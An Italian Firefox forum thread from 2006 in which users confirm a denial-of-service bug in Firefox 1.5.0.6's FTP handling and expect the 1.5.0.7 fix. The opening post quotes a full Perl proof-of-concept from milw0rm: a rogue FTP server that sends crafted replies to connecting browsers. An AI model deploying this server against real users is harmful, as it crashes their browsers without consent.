Notizie: scarica ora l'ultima versione disponibile di Firefox!

Autore Topic: Security Bug per Ff 1.5.0.6  (Letto 2367 volte)

0 Utenti e 1 Visitatore stanno visualizzando questo topic.

Offline Generazione2000

  • Post: 125
    • Generazione2000
Security Bug per Ff 1.5.0.6
« il: 13 Settembre 2006 13:50:08 »
Ciao,

mi hanno riportato quanto segue e ne cercavo conferma, il bug viene riportato da milw0rm.com, ma senza descriverne le conseguenze.

Il codice è il seguente:
Codice: [Seleziona]
#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname('tcp');
my $payload =
"\x32\x32\x30\x20\x5a\x0d\x0a\x33".
"\x33\x31\x20\x5a\x0d\x0a\x35\x30".
"\x30\x20\x44\x6f\x53\x0d\x0a\x35".
"\x30\x30\x20\x5a\x0d\x0a";


socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";

my $paddr = sockaddr_in($port, INADDR_ANY);

bind(SERVER, $paddr) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
print "ftp://D:oS@\x0localhost:2121/\n";

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
       # find out who connected
       my ($client_port, $client_ip) = sockaddr_in($client_addr);
       my $client_ipnum = inet_ntoa($client_ip);
       my $client_host = gethostbyaddr($client_ip, AF_INET);
       print ": $client_host", "[$client_ipnum]\n";
       # send them a message, close connection
       print CLIENT $payload;
       close CLIENT;
}

# milw0rm.com [2006-08-22]

Saluti

Stefano

Offline halifax

  • Post: 5904
Re: Security Bug per Ff 1.5.0.6
« Risposta #1 il: 13 Settembre 2006 14:14:15 »
Sicuro che riguardi la 1.5.0.6 e non una versione precedente?

Offline Generazione2000

  • Post: 125
    • Generazione2000
Re: Security Bug per Ff 1.5.0.6
« Risposta #2 il: 13 Settembre 2006 14:26:10 »
Si, riguarda la versione attuale, puoi vedere sul Sito stesso che l'ha pubblicata.
http://www.milw0rm.com
A me è stato riportato e nonl'ho trovata nei bug attuali

ciao

Offline Michele Dal Corso

  • Post: 1321
Re: Security Bug per Ff 1.5.0.6
« Risposta #3 il: 13 Settembre 2006 14:40:42 »
Sì è confermata:
http://www.securityfocus.com/bid/19678/info
ma si tratta di un problema DOS (ossia firefox si blocca) limitato alle connessioni ftp.

In ogni caso per il rilascio della 1.5.0.7 credo sia questione di ore... Il pacchetto è già pronto e credo stiano facendo gli ultimi test.

Ciao,
Michele

Offline halifax

  • Post: 5904
Re: Security Bug per Ff 1.5.0.6
« Risposta #4 il: 13 Settembre 2006 15:19:17 »
Strano che sul sito secunia non ci sia niente al riguardo, sollitamente sono tra i più celeri e affidabili su queste problematiche :?

0 Utenti e 1 Visitatore stanno visualizzando questo topic.